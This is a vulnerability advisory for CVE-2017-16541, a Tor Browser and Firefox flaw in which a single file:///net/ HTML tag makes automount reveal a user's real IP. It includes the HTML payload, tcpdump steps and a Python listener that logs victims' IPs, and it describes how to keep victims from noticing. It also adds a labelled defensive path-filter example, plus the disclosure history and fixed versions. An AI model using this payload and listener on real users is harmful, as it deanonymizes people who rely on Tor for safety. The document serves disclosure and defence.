Tor Browser 7.0.8 Information Disclosure

Posted Sep 11, 2018
Authored by Filippo Cavallarin

This write up holds the details for the Tor Browser information disclosure vulnerability as discussed in CVE-2017-16541. Version 7.0.8 is affected.

tags | exploit, info disclosure
advisories | CVE-2017-16541
MD5 | 271de236533c8c6c6b398877415184db

Hi,
here are the details for CVE-2017-16541 (Tor Browser information disclosure).

More info at: https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/



Tor Browser version 7.0.8, and probably prior versions, for Mac OS X and Linux, is affected by an information disclosure vulnerability that leads to full de-anonymization of website visitors using just a single HTML tag. The vulnerability also affects Firefox (versions <= 62.0 / 60.2.0 ESR).



Vulnerability Details

The vulnerability exists because Firefox fails to prevent automount/autofs from being invoked by a webpage through the file:// handler.
Basically, automount is a program that allows NFS mount points to be mounted automatically when they are accessed. For example, it can be configured to trigger an NFS connection to test.com:/mydir when /localdir is accessed on the client machine.
Automount can also be configured to allow a path starting with /net/ to specify the remote server address and path, so /net/test.com/aa will trigger an NFS connection to test.com. This is the default configuration on Mac OS X.
This functionality can be triggered in many ways from a webpage by calling the file:// handler, for example with: <link href='file:///net/test.com/a.css' rel='stylesheet'>.
NFS mount points are handled by the kernel, so there is no way for a browser to tunnel their connections through a proxy.
An interesting part is that this vulnerability can be exploited even if JavaScript is disabled.
This vulnerability only affects Mac OS X users with the default configuration and Linux users with the automount package installed and configured accordingly.


PoC

To demonstrate this issue follow the steps below:

host an HTML page with the following content:
<link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>

1. run "tcpdump port 111"
2. load the previously hosted page into Tor Browser

Watch the output of tcpdump; you should see UDP packets sent to 12.12.12.12.
To exploit this vulnerability to deanonymize a Tor Browser user, an attacker needs to host the malicious page on a server he/she owns, trick the victim into loading the malicious page and watch the output of tcpdump (running on the webserver).
Doing so, the victim's browser will show a loading indicator until a successful NFS mount is performed or until the NFS timeout is reached.
As a result the victim may notice that something unusual is happening. To prevent this the attacker has (at least) two options:

1. configure an NFS server so the victim's machine will complete the connection without waiting
2. listen for portmap requests (UDP port 111) and immediately reject the connection

The problem with the first option is that the mountpoint may remain visible to the victim and it may also leave some traces in the log files.
The second option involves some Python code that gracefully terminates the RPC requests (the listing below is the original Python 2 snippet with the missing imports and indentation restored and the print statements written as Python 3 calls):

import socket
import sys

BIND_ADDR = "0.0.0.0"
BIND_PORT = 111  # portmap / rpcbind (needs privileges to bind)

sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    sok.bind((BIND_ADDR, BIND_PORT))
except Exception as e:
    print(e)
    sys.exit(1)

print("Waiting for victims on UDP port %d\n" % BIND_PORT)
while True:
    data, addr = sok.recvfrom(1024)
    ip = addr[0]
    print("TRUE IP: %s" % ip)

    # reply with PROGRAM_NOT_AVAILABLE to drop the connection:
    # first 4 bytes echo the request XID, then msg_type = 1 (REPLY),
    # then 20 zero bytes (accepted reply, null verifier, port 0),
    # so the client sees "program not registered" and gives up
    rpl = data[:4] + b"\x00\x00\x00\x01" + bytes(20)

    if not sok.sendto(rpl, addr):
        print("Error sending reply to %s" % ip)

Due to its nature, Tormoil can de-anonymize both visitors of hidden services and visitors of regular internet websites, and can also be "injected" using Man In The Middle techniques (e.g. by exit node owners).


History

This vulnerability was discovered and reported to the Tor Project on 10-26-2017 and got fixed in a matter of days.
Tor Browser is based on Firefox, which was also affected by the same vulnerability, but since the Firefox team rated this vulnerability as moderate it took longer to get fixed.
In the meantime the Tor Browser team applied a temporary fix to their browser that prevents any access to file:// resources.
This was a perfectly coherent solution since the focus of Tor Browser is user anonymity. However, this fix broke a legitimate functionality of a "normal" browser, so the Firefox team did not implement this solution.
Instead they worked for months on a blacklisting mechanism that filters out "dangerous" paths and prevents automount from being triggered.
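The path-filtering approach described above, applied to the /net/ trigger from the Vulnerability Details section, as an added defensive example (not code from the advisory, from Tor Browser or from Firefox): it normalizes file:// URLs before comparing them against a list of automount roots, and scans passive href/src references in a page for hits. The function names, the AUTOMOUNT_ROOTS set (only "/net" comes from the advisory) and SAMPLE_HTML are assumptions constructed for this example.

```python
# Added example (not from the advisory): a defensive check of the kind the
# write-up says Firefox adopted, a blocklist of local paths that would trigger
# automount. The real Firefox list is not on the page; "/net" is the only
# root the advisory names, so the set below is an assumption to be extended.
import posixpath
import re
from urllib.parse import urlsplit, unquote

AUTOMOUNT_ROOTS = ("/net",)

def is_automount_trigger(url, roots=AUTOMOUNT_ROOTS):
    """True if a file:// URL resolves to a path under an automount root."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != "file":
        return False
    # Decode percent-escapes and collapse ".." / "." / repeated slashes so
    # file:///tmp/../%6Eet/x still resolves to /net/x before the comparison.
    path = posixpath.normpath(unquote(parts.path))
    if not path.startswith("/"):
        path = "/" + path
    return any(path == r or path.startswith(r + "/") for r in roots)

# href/src attributes fetch sub-resources without any script, which is the
# <link href=...> case the advisory uses; quoted and unquoted values allowed.
_REF_ATTR = re.compile(r"""\b(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

def find_automount_refs(html):
    """Return every href/src URL in the document that would hit automount."""
    hits = []
    for m in _REF_ATTR.finditer(html):
        url = next(g for g in m.groups() if g is not None)
        if is_automount_trigger(url):
            hits.append(url)
    return hits

# Constructed sample page: plain, percent-encoded, traversal and host forms,
# plus two harmless references that must not be flagged.
SAMPLE_HTML = """<html><head>
<link href='file:///net/192.0.2.10/a.css' rel='stylesheet'>
<link href="file:///tmp/../%6Eet/example.test/b.css" rel=stylesheet>
<img src=file://localhost/net/example.test/c.png>
<link href='file:///usr/share/ok.css' rel='stylesheet'>
<script src="https://example.test/app.js"></script>
</head></html>"""

if __name__ == "__main__":
    for u in find_automount_refs(SAMPLE_HTML):
        print("would trigger automount:", u)
```

Normalizing before matching is the point: a filter that only looks for the literal string "/net/" misses the percent-encoded and ".." forms, and a filter that blocks file:// entirely is the Tor Browser stop-gap the text describes.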



Solution

Update Tor Browser to version 7.0.9

Update Firefox to version 62.0 or 60.2.0 ESR



References

https://blog.torproject.org/tor-browser-709-released
https://www.wearesegment.com/research/tormoil-deanonymize-tor-browser-users-with-automount/


Credits

Filippo Cavallarin (filippo.cavallarin@wearesegment.com)
